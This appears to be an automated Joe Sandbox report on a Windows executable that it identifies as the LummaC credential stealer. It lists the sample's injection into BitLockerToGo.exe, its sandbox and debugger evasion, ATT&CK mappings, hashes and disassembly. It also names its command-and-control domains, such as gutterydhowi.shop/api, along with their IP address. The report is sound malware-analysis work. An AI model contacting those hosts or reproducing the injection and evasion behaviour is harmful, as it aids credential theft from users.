Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 1_2_004155DC	1_2_004155DC
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 1_2_004405A4	1_2_004405A4
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 1_2_004405A4	1_2_004405A4
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 1_2_0040166E	1_2_0040166E
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 1_2_00423672	1_2_00423672
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 1_2_004036F0	1_2_004036F0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 1_2_0042B810	1_2_0042B810
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 1_2_00449950	1_2_00449950
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 1_2_0044A9A2	1_2_0044A9A2
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 1_2_00438A50	1_2_00438A50
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 1_2_00427ADF	1_2_00427ADF
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 1_2_0044BAF0	1_2_0044BAF0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 1_2_00413B52	1_2_00413B52
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 1_2_0042DB06	1_2_0042DB06
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 1_2_00433B19	1_2_00433B19
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 1_2_00410BAE	1_2_00410BAE
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 1_2_00407D40	1_2_00407D40
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 1_2_00409D09	1_2_00409D09
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 1_2_0040BDF0	1_2_0040BDF0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 1_2_00436DB0	1_2_00436DB0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 1_2_0040AE50	1_2_0040AE50
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 1_2_0041DE06	1_2_0041DE06
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 1_2_00449FC0	1_2_00449FC0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 1_2_00410FD0	1_2_00410FD0

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: String function: 0040C980 appears 49 times
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: String function: 0041CE20 appears 165 times

Source: file.exe, 00000000.00000002.1802808473.000000000239A000.00000004.00001000.00020000.00000000.sdmp

Binary or memory string: OriginalFilenameBITLOCKERTOGO.EXEj% vs file.exe

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 00000000.00000002.1802808473.0000000002002000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Matched rule: Msfpayloads_msf_9 date = 2017-02-09, hash1 = e408678042642a5d341e8042f476ee7cef253871ef1c9e289acf0ee9591d1e81, author = Florian Roth, description = Metasploit Payloads - file msf.war - contents, reference = Internal Research

Source: classification engine

Classification label: mal100.troj.evad.winEXE@3/0@2/1

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Code function: 1_2_00437420 CoCreateInstance,

1_2_00437420

Source: file.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: file.exe

ReversingLabs: Detection: 26%

Source: file.exe	String found in binary or memory: net/addrselect.go
Source: file.exe	String found in binary or memory: github.com/saferwall/pe@v1.5.4/loadconfig.go

Source: C:\Users\user\Desktop\file.exe

File read: C:\Users\user\Desktop\file.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"	Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior

Source: file.exe

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: file.exe

Static file information: File size 12859392 > 1048576

Source: file.exe	Static PE information: Raw size of .text is bigger than: 0x100000 < 0x535c00
Source: file.exe	Static PE information: Raw size of .rdata is bigger than: 0x100000 < 0x65ec00

Source: file.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source:	Binary string: BitLockerToGo.pdb source: file.exe, 00000000.00000002.1802808473.000000000239A000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: BitLockerToGo.pdbGCTL source: file.exe, 00000000.00000002.1802808473.000000000239A000.00000004.00001000.00020000.00000000.sdmp

Source: file.exe

Static PE information: section name: .symtab

Source: C:\Users\user\Desktop\file.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe TID: 3744

Thread sleep time: -30000s >= -30000s

Jump to behavior

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: BitLockerToGo.exe, 00000001.00000003.1808487829.0000000002CA0000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000002.1820785163.0000000002CA0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: BitLockerToGo.exe, 00000001.00000002.1820785163.0000000002C5C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW^
Source: file.exe, 00000000.00000002.1799972236.000000000089C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

API call chain: ExitProcess graph end node

graph_1-20360

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Process queried: DebugPort

Jump to behavior

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Code function: 1_2_004478C0 LdrInitializeThunk,

1_2_004478C0

HIPS / PFW / Operating System Protection Evasion

Allocates memory in foreign processes

Source: C:\Users\user\Desktop\file.exe

Memory allocated: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 400000 protect: page execute and read and write

Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\file.exe

Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 400000 value starts with: 4D5A

Jump to behavior

LummaC encrypted strings found

Source: file.exe, 00000000.00000002.1802808473.0000000002002000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: reinforcenh.shop
Source: file.exe, 00000000.00000002.1802808473.0000000002002000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: stogeneratmns.shop
Source: file.exe, 00000000.00000002.1802808473.0000000002002000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: fragnantbui.shop
Source: file.exe, 00000000.00000002.1802808473.0000000002002000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: drawzhotdog.shop
Source: file.exe, 00000000.00000002.1802808473.0000000002002000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: vozmeatillu.shop
Source: file.exe, 00000000.00000002.1802808473.0000000002002000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: offensivedzvju.shop
Source: file.exe, 00000000.00000002.1802808473.0000000002002000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: ghostreedmnu.shop
Source: file.exe, 00000000.00000002.1802808473.0000000002002000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: gutterydhowi.shop
Source: file.exe, 00000000.00000002.1802808473.0000000002002000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: pianoswimen.shop

Writes to foreign memory regions

Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 96E008	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 400000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 401000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 44D000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 450000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 460000	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Process created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"

Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Users\user\Desktop\file.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\AppReadiness VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformation	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: 1.2.BitLockerToGo.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.BitLockerToGo.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.1820464419.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1802808473.0000000002002000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1802808473.000000000217D000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: 1.2.BitLockerToGo.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.BitLockerToGo.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.1820464419.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1802808473.0000000002002000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1802808473.000000000217D000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Windows Management Instrumentation	1 DLL Side-Loading	311 Process Injection	2 Virtualization/Sandbox Evasion	OS Credential Dumping	11 Security Software Discovery	Remote Services	1 Screen Capture	11 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	2 Command and Scripting Interpreter	Boot or Logon Initialization Scripts	1 DLL Side-Loading	311 Process Injection	LSASS Memory	2 Virtualization/Sandbox Evasion	Remote Desktop Protocol	1 Archive Collected Data	2 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 PowerShell	Logon Script (Windows)	Logon Script (Windows)	11 Deobfuscate/Decode Files or Information	Security Account Manager	22 System Information Discovery	SMB/Windows Admin Shares	2 Clipboard Data	113 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	2 Obfuscated Files or Information	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	Internet Connection Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
file.exe	26%	ReversingLabs	Win32.Trojan.Generic

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

⊘No Antivirus matches

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
gutterydhowi.shop	172.67.132.32	true	true		unknown
pianoswimen.shop	unknown	unknown	true		unknown

Contacted URLs

Name	Malicious	Reputation
fragnantbui.shop	true	unknown
gutterydhowi.shop	true	unknown
offensivedzvju.shop	true	unknown
https://gutterydhowi.shop/api	true	unknown
drawzhotdog.shop	true	unknown
ghostreedmnu.shop	true	unknown
pianoswimen.shop	true	unknown
reinforcenh.shop	true	unknown
stogeneratmns.shop	true	unknown
vozmeatillu.shop	true	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Reputation
https://www.cloudflare.com/learning/access-management/phishing-attack/	BitLockerToGo.exe, 00000001.00000003.1808467665.0000000002CE7000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.1808487829.0000000002C6D000.00000004.00000020.00020000.00000000.sdmp	false	unknown
https://gutterydhowi.shop/apisw	BitLockerToGo.exe, 00000001.00000002.1820785163.0000000002C82000.00000004.00000020.00020000.00000000.sdmp	false	unknown
https://gutterydhowi.shop/apiC	BitLockerToGo.exe, 00000001.00000002.1820785163.0000000002C5C000.00000004.00000020.00020000.00000000.sdmp	false	unknown
https://github.com/golang/protobuf/issues/1609):	file.exe	false	unknown
https://gutterydhowi.shop/g	BitLockerToGo.exe, 00000001.00000002.1820785163.0000000002C5C000.00000004.00000020.00020000.00000000.sdmp	false	unknown
https://gutterydhowi.shop/	BitLockerToGo.exe, 00000001.00000003.1808487829.0000000002C82000.00000004.00000020.00020000.00000000.sdmp	false	unknown
https://management.azure.compending	file.exe	false	unknown
https://gutterydhowi.shop/api~	BitLockerToGo.exe, 00000001.00000002.1820785163.0000000002C5C000.00000004.00000020.00020000.00000000.sdmp	false	unknown
https://www.cloudflare.com/5xx-err	BitLockerToGo.exe, 00000001.00000002.1820785163.0000000002C5C000.00000004.00000020.00020000.00000000.sdmp	false	unknown
https://www.cloudflare.com/5xx-error-landing	BitLockerToGo.exe, 00000001.00000003.1808467665.0000000002CE7000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.1808487829.0000000002C6D000.00000004.00000020.00020000.00000000.sdmp	false	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
172.67.132.32	gutterydhowi.shop	United States		13335	CLOUDFLARENETUS	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1521515
Start date and time:	2024-09-28 20:29:06 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 3m 46s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	5
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	file.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@3/0@2/1
EGA Information:	Successful, ratio: 50%
HCA Information:	Successful, ratio: 92% Number of executed functions: 13 Number of non-executed functions: 96
Cookbook Comments:	Found application associated with file extension: .exe Stop behavior analysis, all processes terminated

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, conhost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target file.exe, PID 6600 because there are no executed function
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
VT rate limit hit for: file.exe

Simulations

Behavior and APIs

Time	Type	Description
14:30:10	API Interceptor	2x Sleep call for process: BitLockerToGo.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
172.67.132.32	ODFkNglL18.exe	Get hash	malicious	FormBook	Browse	www.vulcanrussia23.xyz/u6vb/?d2=8RKM9+ogc/zNp3a/v/pVBSMp5jGU9CsjRndkhXr9Vs/ymBgKZqRBOQixxTSimPHWcZ1z&4hLT6=9r_Xq4bPK8itcl2p

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
gutterydhowi.shop	injector V2.4.exe	Get hash	malicious	LummaC	Browse	104.21.4.136
	file.exe	Get hash	malicious	LummaC	Browse	172.67.132.32
	FoS5cjKhd3.exe	Get hash	malicious	LummaC	Browse	104.21.4.136
	file.exe	Get hash	malicious	LummaC	Browse	104.21.4.136
	kewyIO69TI.exe	Get hash	malicious	LummaC	Browse	104.21.4.136
	gZzI6gTYn4.exe	Get hash	malicious	LummaC	Browse	104.21.4.136
	U6b3tLFqN5.exe	Get hash	malicious	LummaC	Browse	172.67.132.32
	0UB3FIL25c.exe	Get hash	malicious	LummaC	Browse	172.67.132.32
	file.exe	Get hash	malicious	LummaC, Amadey, CryptOne, LummaC Stealer, PureLog Stealer, RedLine, Socks5Systemz	Browse	104.21.4.136
	file.exe	Get hash	malicious	LummaC, RDPWrap Tool, LummaC Stealer, Vidar	Browse	172.67.132.32

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	Callus+1(814)-310-9943.pdf	Get hash	malicious	PayPal Phisher	Browse	172.64.41.3
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	172.67.167.90
	file.exe	Get hash	malicious	Vidar	Browse	104.21.73.223
	file.exe	Get hash	malicious	LummaC, Clipboard Hijacker, Cryptbot, LummaC Stealer, Neoreklami, Socks5Systemz	Browse	162.159.129.233
	Trjscan_[7MB]_[unsign].exe	Get hash	malicious	LummaC	Browse	188.114.97.3
	Trjscan_[7MB]_[unsign].exe	Get hash	malicious	LummaC	Browse	188.114.97.3
	https://pub-8808e94b1a5c49dbb2a2e0829ec1562b.r2.dev/index.html	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	SecuriteInfo.com.Trojan.PackedNET.3066.19627.4428.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	injector V2.4.exe	Get hash	malicious	LummaC	Browse	104.21.13.199
	injector V2.4.exe	Get hash	malicious	LummaC	Browse	104.21.4.136

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	172.67.132.32
	file.exe	Get hash	malicious	LummaC, Clipboard Hijacker, Cryptbot, LummaC Stealer, Neoreklami, Socks5Systemz	Browse	172.67.132.32
	Trjscan_[7MB]_[unsign].exe	Get hash	malicious	LummaC	Browse	172.67.132.32
	Trjscan_[7MB]_[unsign].exe	Get hash	malicious	LummaC	Browse	172.67.132.32
	injector V2.4.exe	Get hash	malicious	LummaC	Browse	172.67.132.32
	injector V2.4.exe	Get hash	malicious	LummaC	Browse	172.67.132.32
	Website_Redesign_Project.xls	Get hash	malicious	Unknown	Browse	172.67.132.32
	3Yx0qhONfl.exe	Get hash	malicious	LummaC	Browse	172.67.132.32
	3Yx0qhONfl.exe	Get hash	malicious	LummaC	Browse	172.67.132.32
	gUYxlFvXzl.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer	Browse	172.67.132.32

Dropped Files

⊘No context

Created / dropped Files

⊘No created / dropped files found

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	5.81406347451965
TrID:	Win32 Executable (generic) a (10002005/4) 99.53% InstallShield setup (43055/19) 0.43% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	file.exe
File size:	12'859'392 bytes
MD5:	54e50cc52a1d35cdd951d475e0fb7aa9
SHA1:	b5f83428a5b8c07dbd239beed5605282f73e5dbd
SHA256:	d3bdd83b9fe90afaead22c1e6bfc2051e6cfa6e885986cc4c87708415d0484f8
SHA512:	b3744afebaed35b0c5da88a7ab79c5ffa7accec3d3e2f5265e188766be622731f520f34d0f0879639f409adbbe84d6310f604d168d6b5af2f0b14c35ab58ee9e
SSDEEP:	98304:uTquv2ul6fIjXwFbO6XsYOechIZnebzL2Ud+R:0STb/OegmX
TLSH:	66D62840FA8B48F6DE43847690AB726F13349D018B39CB9BEB147F69E8772911C37649
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........................\S..L.......8.......`....@.......................................@................................

File Icon


Icon Hash:	2d2e3797b32b2b99

Static PE Info

General

Entrypoint:	0x4738d0
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x0 [Thu Jan 1 00:00:00 1970 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	1
File Version Major:	6
File Version Minor:	1
Subsystem Version Major:	6
Subsystem Version Minor:	1
Import Hash:	1aae8bf580c846f39c71c05898e57e88

Entrypoint Preview

Instruction
jmp 00007FBCC8C716D0h
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
sub esp, 28h
mov dword ptr [esp+1Ch], ebx
mov dword ptr [esp+10h], ebp
mov dword ptr [esp+14h], esi
mov dword ptr [esp+18h], edi
mov dword ptr [esp], eax
mov dword ptr [esp+04h], ecx
call 00007FBCC8C4CDF6h
mov eax, dword ptr [esp+08h]
mov edi, dword ptr [esp+18h]
mov esi, dword ptr [esp+14h]
mov ebp, dword ptr [esp+10h]
mov ebx, dword ptr [esp+1Ch]
add esp, 28h
retn 0004h
ret
int3
int3
int3
int3
int3
int3
sub esp, 08h
mov ecx, dword ptr [esp+0Ch]
mov edx, dword ptr [ecx]
mov eax, esp
mov dword ptr [edx+04h], eax
sub eax, 00010000h
mov dword ptr [edx], eax
add eax, 00000BA0h
mov dword ptr [edx+08h], eax
mov dword ptr [edx+0Ch], eax
lea edi, dword ptr [ecx+34h]
mov dword ptr [edx+18h], ecx
mov dword ptr [edi], edx
mov dword ptr [esp+04h], edi
call 00007FBCC8C73B34h
cld
call 00007FBCC8C72BBEh
call 00007FBCC8C717F9h
add esp, 08h
ret
jmp 00007FBCC8C739E0h
int3
int3
int3
